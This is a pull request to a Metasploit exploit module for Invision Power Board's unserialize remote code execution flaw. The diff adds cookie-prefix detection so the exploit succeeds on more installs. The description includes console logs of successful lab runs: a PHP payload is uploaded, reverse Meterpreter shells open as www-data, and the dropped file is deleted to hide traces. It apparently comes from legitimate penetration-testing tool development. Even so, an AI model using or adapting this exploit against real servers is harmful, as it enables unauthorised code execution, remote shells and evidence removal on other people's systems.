### PR TITLE
added cookie prefix check

### DIFF
--- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
@@ -109,6 +109,20 @@ class Metasploit3 < Msf::Exploit::Remote
 		@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
 		@peer = "#{rhost}:#{rport}"
 
+		print_status("#{@peer} - Checking for cookie prefix")
+		res = send_request_cgi(
+		{
+			'uri' => "#{base}index.php",
+			'method' => 'GET'
+		})
+
+		if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
+			print_status("#{@peer} - Cookie prefix #{$1} found")
+			cookie_prefix = $1
+		else
+			cookie_prefix = ""
+		end
+
 		# get_write_exec_payload uses a function, which limits our ability to support
 		# Linux payloads, because that requires a space:
 		#   function my_cmd
@@ -128,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		{
 			'uri' => "#{base}index.php?#{php_payload}",
 			'method' => 'GET',
-			'cookie' => "member_id=#{Rex::Text.uri_encode(db_driver_mysql)}"
+			'cookie' => "#{cookie_prefix}member_id=#{Rex::Text.uri_encode(db_driver_mysql)}"
 		})
 
 		if not res or res.code != 200


### PR DESCRIPTION
Thanks to EgiX for pointing this!

The module can fails if Invision Pboard has been configured with a cookie prefix. Fixed in thispull request.
- Module working when ipboard hasn't configured a cookie prefix

<pre>
msf  exploit(invision_pboard_unserialize_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.151:80 - Checking for cookie prefix
[*] 192.168.1.151:80 - Exploiting the unserialize() to upload PHP code
[*] 192.168.1.151:80 - Executing the payload bvnpy.php
[*] Sending stage (39217 bytes) to 192.168.1.151
[*] Meterpreter session 7 opened (192.168.1.129:4444 -> 192.168.1.151:44918) at 2012-11-14 16:16:58 +0100
[!] 192.168.1.151:80 - Deleting bvnpy.php
[+] 192.168.1.151:80 - bvnpy.php removed to stay ninja


meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
</pre>

- Module working when ipboard has configured a cookie prefix

<pre>
msf  exploit(invision_pboard_unserialize_exec) > exploit

[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.151:80 - Checking for cookie prefix
[*] 192.168.1.151:80 - Cookie prefix msf found
[*] 192.168.1.151:80 - Exploiting the unserialize() to upload PHP code
[*] 192.168.1.151:80 - Executing the payload evTn.php
[*] Sending stage (39217 bytes) to 192.168.1.151
[*] Meterpreter session 8 opened (192.168.1.129:4444 -> 192.168.1.151:44942) at 2012-11-14 16:18:58 +0100
[!] 192.168.1.151:80 - Deleting evTn.php
[+] 192.168.1.151:80 - evTn.php removed to stay ninja

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

</pre>
